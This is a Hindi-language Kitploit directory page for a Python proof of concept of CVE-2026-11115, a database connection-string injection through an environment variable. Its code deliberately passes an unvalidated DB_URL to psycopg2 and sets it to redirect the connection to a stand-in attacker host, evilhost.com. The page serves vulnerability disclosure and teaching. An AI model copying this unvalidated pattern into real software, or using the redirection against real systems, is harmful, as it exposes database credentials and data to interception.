Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable — CVE-2026-11115 के लिए न्यूनतम Python प्रूफ-ऑफ-कॉन्सेप्ट, जो पर्यावरण चर और हमलावर-नियंत्रित PostgreSQL होस्ट्स पर पुनर्निर्देशन के माध्यम से डेटाबेस कनेक्शन स्ट्रिंग इंजेक्शन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशनलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

CVE-2026-11115 के लिए न्यूनतम Python प्रूफ-ऑफ-कॉन्सेप्ट, जो पर्यावरण चर और हमलावर-नियंत्रित PostgreSQL होस्ट्स पर पुनर्निर्देशन के माध्यम से डेटाबेस कनेक्शन स्ट्रिंग इंजेक्शन प्रदर्शित करता है।

रिपॉजिटरी देखें
51 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-11115 – पर्यावरण चर के माध्यम से डेटाबेस कनेक्शन स्ट्रिंग इंजेक्शन

प्रोग्राम कोड (Python)

root@kitploit:~
# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – डेटाबेस कनेक्शन स्ट्रिंग इंजेक्शन

Severity: High

अवलोकन

एक एप्लिकेशन बिना सत्यापन के पर्यावरण चर से अपना डेटाबेस कनेक्शन स्ट्रिंग बनाता है। यदि कोई हमलावर उस चर को प्रभावित कर सकता है (जैसे, सर्वर-साइड रिक्वेस्ट फोर्जरी या CI/CD पाइपलाइन गलत कॉन्फ़िगरेशन के माध्यम से), तो वे डेटाबेस कनेक्शन को अपने सर्वर पर पुनर्निर्देशित कर सकते हैं, डेटा को इंटरसेप्ट या संशोधित कर सकते हैं।

भेद्यता विवरण

  • प्रकार: कनेक्शन स्ट्रिंग इंजेक्शन
  • प्रभाव: डेटा एक्सफ़िल्ट्रेशन, मैन-इन-द-मिडिल।
  • मूल कारण: पूरा कनेक्शन URI पर्यावरण चर से लिया जाता है, और अतिरिक्त पैरामीटर (जैसे host) मूल होस्ट को ओवरराइड करने के लिए जोड़े जा सकते हैं।

एक्सप्लॉइट प्रदर्शन

सिमुलेशन चलाएँ:

root@kitploit:~
pip install psycopg2-binary
python db_connector.py

प्रोग्राम localhost के बजाय evilhost.com से कनेक्ट करने का प्रयास करता है।

टूल डाउनलोड करें